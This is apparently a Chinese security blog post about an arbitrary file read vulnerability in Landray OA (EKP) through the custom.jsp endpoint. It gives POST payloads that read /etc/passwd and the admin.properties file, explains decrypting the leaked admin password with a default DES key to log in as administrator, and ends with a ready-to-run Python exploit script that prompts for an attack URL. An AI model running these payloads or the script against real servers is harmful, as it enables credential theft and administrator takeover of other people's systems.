一、漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。
二、漏洞复现
访问以下接口
/sys/ui/extend/varkind/custom.jsp
根据返回页面可以看到是存在该接口的
然后抓包并修改为
POST
方式,并加上
payload
var={"body":{"file":"file:///etc/passwd"}} 针对linux服务器
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}} 针对windows服务器
通过对比可以知道不要试完
payload
读不出来就放弃了,觉得它不存在这个漏洞,说不定这个服务器是在
windows
上呐。
这里读取的
admin.properties
配置文件可以泄露系统后台的密码
由于蓝凌
OA
默认是
DES
加密,且 默认密钥为
kmssAdminKey
,所以只要拿着响应中的
password
值进行解密就好(返回的
password
字符串去掉末尾的
/r
再进行解密)
DES
解密
http://tool.chacuo.net/cryptdes/
得到密码之后即可访问后台以管理员身份登入系统
http://xx.xx.xx.xx/admin.do
三、POC脚本
漏洞利用脚本如下
#!/usr/bin/python3
#-*- coding:utf-8 -*-
import base64
import requests
import random
import re
import json
import sys
def title():
print('+------------------------------------------')
print('++++++ 公众号: 守卫者安全 ')
print('++++++ POC名称: 蓝凌OA 任意文件读取POC ')
print('++++++ 使用方法: python3 poc.py ')
print('++++++ Url >>> http://xxx.xxx.xxx.xxx ')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}
data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
#proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)
print("正在请求 {}/sys/ui/extend/varkind/custom.jsp ".format(target_url))
if "password" in response.text and response.status_code == 200:
print("成功读取 admin.properties 响应为:{} ".format(response.text))
except Exception as e:
print("请求失败:{} ".format(e))
sys.exit(0)
#
if __name__ == '__main__':
title()
target_url = str(input("Please input Attack Url >>> "))
POC_1(target_url)
如有侵权,请联系删除
推荐阅读
查看更多精彩内容,还请关注 橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“ 再看”